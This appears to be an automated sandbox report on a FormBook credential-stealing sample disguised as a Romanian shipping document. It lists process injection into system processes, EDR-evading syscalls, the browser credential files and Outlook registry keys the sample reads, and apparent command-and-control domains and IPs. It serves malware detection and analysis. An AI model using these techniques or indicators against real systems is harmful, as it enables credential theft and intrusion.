            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]2_2_030FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]2_2_030BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]2_2_030BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]2_2_0306A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]2_2_03042840
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006E81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006E81F7
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006BA364 SetUnhandledExceptionFilter,0_2_006BA364
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006BA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006BA395

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Documente de expediere.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\certutil.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: NULL target: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: NULL target: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\certutil.exeThread register set: target process: 7584Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\certutil.exeThread APC queued: target process: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Documente de expediere.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3C2008Jump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006E8C93 LogonUserW,0_2_006E8C93
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00693B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00693B4C
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00694A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00694A35
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F4EF5 mouse_event,0_2_006F4EF5
            Source: C:\Users\user\Desktop\Documente de expediere.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Documente de expediere.exe"Jump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeProcess created: C:\Windows\SysWOW64\certutil.exe "C:\Windows\SysWOW64\certutil.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006E81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006E81F7
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006F4C03
            Source: Documente de expediere.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Documente de expediere.exe, QAWHbhvedb.exe, 0000000D.00000000.1457508955.0000000001891000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000002.3713023900.0000000001890000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1610140247.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: QAWHbhvedb.exe, 0000000D.00000000.1457508955.0000000001891000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000002.3713023900.0000000001890000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1610140247.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: QAWHbhvedb.exe, 0000000D.00000000.1457508955.0000000001891000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000002.3713023900.0000000001890000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1610140247.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: QAWHbhvedb.exe, 0000000D.00000000.1457508955.0000000001891000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000002.3713023900.0000000001890000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1610140247.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B886B cpuid 0_2_006B886B
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006C50D7
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006D2230 GetUserNameW,0_2_006D2230
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_006C418A
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00694AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00694AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\certutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\certutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Documente de expediere.exeBinary or memory string: WIN_81
            Source: Documente de expediere.exeBinary or memory string: WIN_XP
            Source: Documente de expediere.exeBinary or memory string: WIN_XPe
            Source: Documente de expediere.exeBinary or memory string: WIN_VISTA
            Source: Documente de expediere.exeBinary or memory string: WIN_7
            Source: Documente de expediere.exeBinary or memory string: WIN_8
            Source: Documente de expediere.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00706596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00706596
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00706A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00706A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1477464 Sample: Documente de expediere.exe Startdate: 21/07/2024 Architecture: WINDOWS Score: 100 28 www.shiybalinks.com 2->28 30 www.sehraji.com 2->30 32 22 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 48 6 other signatures 2->48 10 Documente de expediere.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 QAWHbhvedb.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 certutil.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 QAWHbhvedb.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.fardehb.top 203.161.41.207, 49726, 49727, 49728 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 karak-networks.online 84.32.84.32, 49730, 49731, 49732 NTT-LT-ASLT Lithuania 22->36 38 7 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Documente de expediere.exe74%ReversingLabsWin32.Backdoor.FormBook
            Documente de expediere.exe50%VirustotalBrowse
            Documente de expediere.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.evoolihubs.shop0%VirustotalBrowse
            funnelkakes.com0%VirustotalBrowse
            www.jleabres.com2%VirustotalBrowse
            karak-networks.online0%VirustotalBrowse
            www.funnelkakes.com0%VirustotalBrowse
            www.marktuana.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP0%Avira URL Cloudsafe
            http://www.sehraji.com/rjez/0%Avira URL Cloudsafe
